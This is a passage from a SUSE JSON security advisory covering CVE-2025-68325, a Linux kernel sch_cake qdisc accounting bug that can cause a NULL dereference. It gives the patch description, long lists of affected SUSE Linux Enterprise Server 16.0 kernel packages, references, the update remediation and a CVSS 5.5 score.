{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68320"
},
{
"cve": "CVE-2025-68325",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68325"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_cake: Fix incorrect qlen reduction in cake_drop\n\nIn cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen\nand backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes\nthat the parent qdisc will enqueue the current packet. However, this\nassumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent\nqdisc stops enqueuing current packet, leaving the tree qlen/backlog\naccounting inconsistent. This mismatch can lead to a NULL dereference\n(e.g., when the parent Qdisc is qfq_qdisc).\n\nThis patch computes the qlen/backlog delta in a more robust way by\nobserving the difference before and after the series of cake_drop()\ncalls, and then compensates the qdisc tree accounting if cake_enqueue()\nreturns NET_XMIT_CN.\n\nTo ensure correct compensation when ACK thinning is enabled, a new\nvariable is introduced to keep qlen unchanged.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68325",
"url": "https://www.suse.com/security/cve/CVE-2025-68325"
},
{
"category": "external",
"summary": "SUSE Bug 1255417 for CVE-2025-68325",
"url": "https://bugzilla.suse.com/1255417"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
